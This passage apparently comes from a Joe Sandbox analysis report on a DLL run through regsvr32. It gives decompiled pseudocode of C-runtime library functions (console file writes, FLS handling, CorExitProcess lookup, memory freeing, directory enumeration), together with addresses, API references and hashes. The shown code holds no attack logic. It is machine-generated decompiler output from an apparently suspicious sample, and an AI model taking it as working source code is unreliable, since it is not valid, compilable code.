									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E6E4647A8(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x6e475620 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x6e475620 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x6e475620 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E6E461CCE( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E6E461CCE();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6E45AF4F(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x6e464e77
0x6e464e7e
0x6e464e81
0x6e464e89
0x6e464e8c
0x6e464e99
0x6e464e9c
0x6e464e9f
0x6e464ea6
0x6e464eae
0x6e464eb1
0x6e464eb4
0x6e464eba
0x6e464ebc
0x6e464ec3
0x6e464ecd
0x6e464ecf
0x6e464ed2
0x6e464ed5
0x6e464ed8
0x6e464edb
0x6e464ede
0x6e464ee4
0x6e4651ef
0x6e4651ef
0x00000000
0x6e464eea
0x6e464ef2
0x6e464ef5
0x6e464efb
0x6e464efe
0x6e464f05
0x6e464f0c
0x6e464f0f
0x00000000
0x00000000
0x6e464f18
0x6e464f1d
0x6e464f1f
0x6e464f22
0x6e464f27
0x6e464f2b
0x00000000
0x00000000
0x00000000
0x6e464f2b
0x6e464f30
0x6e464f32
0x6e464f37
0x6e464ff1
0x6e464ff8
0x6e464ff9
0x6e464ffc
0x6e464ffe
0x6e4651a2
0x6e4651a4
0x00000000
0x6e4651a6
0x6e4651a6
0x6e4651a9
0x6e4651b8
0x6e4651bc
0x6e4651bd
0x6e4651bd
0x00000000
0x6e4651c1
0x6e465004
0x6e465006
0x6e46500c
0x6e46500f
0x6e46501b
0x6e465024
0x6e46502f
0x6e465034
0x6e465037
0x6e46503a
0x00000000
0x6e465040
0x6e465040
0x00000000
0x6e465040
0x6e46503a
0x6e464f3d
0x6e464f4c
0x6e464f4d
0x6e464f50
0x6e464f53
0x6e464f58
0x6e46516e
0x6e465170
0x6e465172
0x6e465174
0x6e46517e
0x6e465186
0x6e465188
0x6e465189
0x6e46518d
0x6e465190
0x6e465190
0x6e465194
0x6e465194
0x6e465194
0x6e465197
0x6e465197
0x6e465197
0x6e465199
0x6e465199
0x6e46519d
0x6e464f5e
0x6e464f5e
0x6e464f61
0x6e464f63
0x6e464f66
0x6e464f69
0x6e464f6d
0x6e464f6e
0x6e464f72
0x6e464f75
0x6e464f7a
0x6e464f84
0x6e464f89
0x6e464f8c
0x6e464f8f
0x6e464f8f
0x6e464f92
0x6e464f95
0x6e464f97
0x6e464fa0
0x6e464fa4
0x6e464fa5
0x6e464fa9
0x6e464faf
0x6e464fb8
0x6e464fc5
0x6e464fcc
0x6e464fd0
0x6e464fdb
0x6e464fe0
0x6e464fe6
0x00000000
0x6e464fec
0x6e465043
0x6e465044
0x6e4650c7
0x6e4650ce
0x6e4650d6
0x6e4650de
0x6e4650e3
0x6e4650e6
0x6e4650eb
0x00000000
0x6e4650f1
0x6e465106
0x6e4651e6
0x6e4651ec
0x00000000
0x6e46510c
0x6e465115
0x6e465117
0x6e46511d
0x00000000
0x6e465123
0x6e465127
0x6e46515d
0x6e465160
0x00000000
0x6e465166
0x6e465166
0x00000000
0x6e465166
0x6e465129
0x6e46512b
0x6e46512d
0x6e465146
0x00000000
0x6e46514c
0x6e465150
0x00000000
0x6e465156
0x6e465156
0x6e465159
0x6e46515a
0x00000000
0x6e46515a
0x6e465150
0x6e465146
0x6e465127
0x6e46511d
0x6e465106
0x6e4650eb
0x6e464fe6
0x6e464f58
0x00000000
0x6e465048
0x6e465048
0x6e46504c
0x6e46504f
0x6e465071
0x6e465074
0x6e465079
0x6e46507d
0x6e465081
0x6e4650af
0x6e4650b1
0x00000000
0x6e465083
0x6e465083
0x6e465083
0x6e465086
0x6e465089
0x6e46508c
0x6e4651c3
0x6e4651c6
0x6e4651c9
0x6e4651d3
0x6e4651de
0x6e4651e3
0x00000000
0x6e465092
0x6e465099
0x6e46509e
0x6e4650a1
0x6e4650a4
0x00000000
0x6e4650aa
0x6e4650aa
0x00000000
0x6e4650aa
0x6e4650a4
0x6e46508c
0x6e465051
0x6e465055
0x6e465058
0x6e46505d
0x6e465063
0x6e465065
0x6e46506c
0x6e4650b2
0x6e4650b5
0x6e4650b6
0x6e4650bb
0x6e4650be
0x6e4650c1
0x00000000
0x00000000
0x00000000
0x00000000
0x6e4650c1
0x00000000
0x6e46504f
0x6e464eea
0x6e4651f2
0x6e4651f2
0x6e4651f4
0x6e4651f7
0x6e4651f7
0x6e4651f7
0x6e4651f7
0x6e465209
0x6e46520b
0x6e46520c
0x6e46520d
0x6e465217

APIs

GetConsoleOutputCP.KERNEL32 ref: 6E464EB4
__fassign.LIBCMT ref: 6E465099
__fassign.LIBCMT ref: 6E4650B6
WriteFile.KERNEL32(?,6E461736,00000000,?,00000000), ref: 6E4650FE
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E46513E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E4651E6

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 501126f50585aa30c68657d5ec2a322301cc2b91fbdd6416e04f8301e6c9964a
Instruction ID: 3b0bd82d5f1fa5e806cddd2eb0dc62dd1f69e9ef122e435a46d52d416f5a1749
Opcode Fuzzy Hash: 501126f50585aa30c68657d5ec2a322301cc2b91fbdd6416e04f8301e6c9964a
Instruction Fuzzy Hash: 92C19E71D042599FCF00CFF8D890DEDBBB5AF49314F18456AE855BB342D635AA06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E45C014 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6E45C014(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6e474030 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6E45D250(_t13, __eflags,  *0x6e474030);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E45D28B(_t14, __eflags,  *0x6e474030, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6E4603DB();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E45D28B(_t18, __eflags,  *0x6e474030, 0);
								} else {
									_t8 = E6E45D28B(_t18, __eflags,  *0x6e474030, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6E45D69D(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6e45c014
0x6e45c01b
0x6e45c02e
0x6e45c035
0x6e45c037
0x6e45c038
0x6e45c03b
0x6e45c054
0x6e45c054
0x6e45c03d
0x6e45c03d
0x6e45c03f
0x6e45c049
0x6e45c050
0x6e45c052
0x6e45c059
0x6e45c062
0x6e45c065
0x6e45c066
0x6e45c068
0x6e45c07c
0x6e45c07c
0x6e45c085
0x6e45c06a
0x6e45c071
0x6e45c077
0x6e45c078
0x6e45c07a
0x6e45c08e
0x6e45c090
0x6e45c090
0x00000000
0x00000000
0x00000000
0x6e45c07a
0x6e45c093
0x00000000
0x00000000
0x00000000
0x6e45c052
0x6e45c03f
0x6e45c09b
0x6e45c0a5
0x6e45c01d
0x6e45c01f
0x6e45c01f

APIs

GetLastError.KERNEL32(00000001,?,6E45B6AF,6E45A36B,6E45A794,?,6E45A9CC,?,00000001,?,?,00000001,?,6E472438,0000000C,6E45AAC5), ref: 6E45C022
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E45C030
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E45C049
SetLastError.KERNEL32(00000000,6E45A9CC,?,00000001,?,?,00000001,?,6E472438,0000000C,6E45AAC5,?,00000001,?), ref: 6E45C09B

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 4085e7f833277c52a205c2732dd74689c987538ab36e8ee05c33b913cd38ee19
Instruction ID: e22ae3b98cd122ce53eda3ea5f0e06105e64aa867efa1c4cf460541dc3bb4bb1
Opcode Fuzzy Hash: 4085e7f833277c52a205c2732dd74689c987538ab36e8ee05c33b913cd38ee19
Instruction Fuzzy Hash: B9012532159B219EAE9426F57C84E6B2B68FF03FBA720073FF524993D4EF51482255D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E45F05A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E6E45F05A(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6e46c164(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6e45f060
0x6e45f064
0x6e45f06f
0x6e45f077
0x6e45f082
0x6e45f088
0x6e45f08c
0x6e45f093
0x6e45f099
0x6e45f099
0x6e45f09b
0x6e45f0a0
0x00000000
0x6e45f0a5
0x6e45f0ac

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E45F00C,?,?,6E45EFD4,6E457C85,?,?), ref: 6E45F06F
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,6E45F00C,?,?,6E45EFD4,6E457C85,?,?), ref: 6E45F082
FreeLibrary.KERNEL32(00000000,?,?,6E45F00C,?,?,6E45EFD4,6E457C85,?,?), ref: 6E45F0A5

Strings

CorExitProcess, xrefs: 6E45F07A
mscoree.dll, xrefs: 6E45F068

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9eb445d2d6135b3b2dd0069008f350418920b2382f36487ea9fd6182d5792865
Instruction ID: 558038b8dcb58a6ec7586986418e18d972107ed01ce9010fdb0ab25e1c5c2e05
Opcode Fuzzy Hash: 9eb445d2d6135b3b2dd0069008f350418920b2382f36487ea9fd6182d5792865
Instruction Fuzzy Hash: 6BF08C3090161AFBDF51BBF0D919FAE7B79EB00B65F200062B905A6250CB30DE00DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E467962 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E467962(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6e474710; // 0x6e474760
					if(_t23 != 0) {
						E6E4610BE(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6e474714; // 0x6e4759e0
					if(_t24 != 0) {
						E6E4610BE(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6e474718; // 0x6e4759e0
					if(_t25 != 0) {
						E6E4610BE(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6e474740; // 0x6e474764
					if(_t26 != 0) {
						E6E4610BE(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6e474744; // 0x6e4759e4
					if(_t27 != 0) {
						return E6E4610BE(_t6);
					}
				}
				return _t6;
			}

0x6e467968
0x6e46796d
0x6e467971
0x6e467977
0x6e46797a
0x6e46797f
0x6e467983
0x6e467989
0x6e46798c
0x6e467991
0x6e467995
0x6e46799b
0x6e46799e
0x6e4679a3
0x6e4679a7
0x6e4679ad
0x6e4679b0
0x6e4679b5
0x6e4679b6
0x6e4679b9
0x6e4679bf
0x00000000
0x6e4679c7
0x6e4679bf
0x6e4679ca

APIs

_free.LIBCMT ref: 6E46797A

Part of subcall function 6E4610BE: HeapFree.KERNEL32(00000000,00000000), ref: 6E4610D4
Part of subcall function 6E4610BE: GetLastError.KERNEL32(00000004,?,6E4679F5,00000004,00000000,00000004,?,?,6E467A1C,00000004,00000007,00000004,?,6E464A49,00000004,00000004), ref: 6E4610E6

_free.LIBCMT ref: 6E46798C
_free.LIBCMT ref: 6E46799E
_free.LIBCMT ref: 6E4679B0
_free.LIBCMT ref: 6E4679C2

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f8aab4fed21cf6e179a684bf112462422cc94dd092337597a54194b42d2d1b3c
Instruction ID: f2c95be96f8599e65f97601178c4f0a484eb9bdea9ffdffec485075b5737c82c
Opcode Fuzzy Hash: f8aab4fed21cf6e179a684bf112462422cc94dd092337597a54194b42d2d1b3c
Instruction Fuzzy Hash: 1DF0A9716086649BDE64EAB9F189C6A37DCEA023503600C4AE428D3B80CB30F8848AE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E462D64 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E462D64(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E6E45F392(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6E4681B1(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E6E45D669();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E6E4610F8(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E6E4681B1(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E6E46334E(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6E4610BE(_t300);
														_t302 = _v12;
													}
													E6E4610BE(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E6E4681B1(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6E45D669();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x6e474024; // 0xb68207cc
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E6E468200(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E6E462D47(_t244 - _t287 + 1, _t287,  &_v676, E6E46325B(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E6E462C78( &(_v608.cFileName),  &_v640,  &_v609, E6E46325B(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E6E4610BE(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E6E4610BE(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E6E467C10(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E6E462BAE);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E6E4610BE(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E6E45AF4F(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
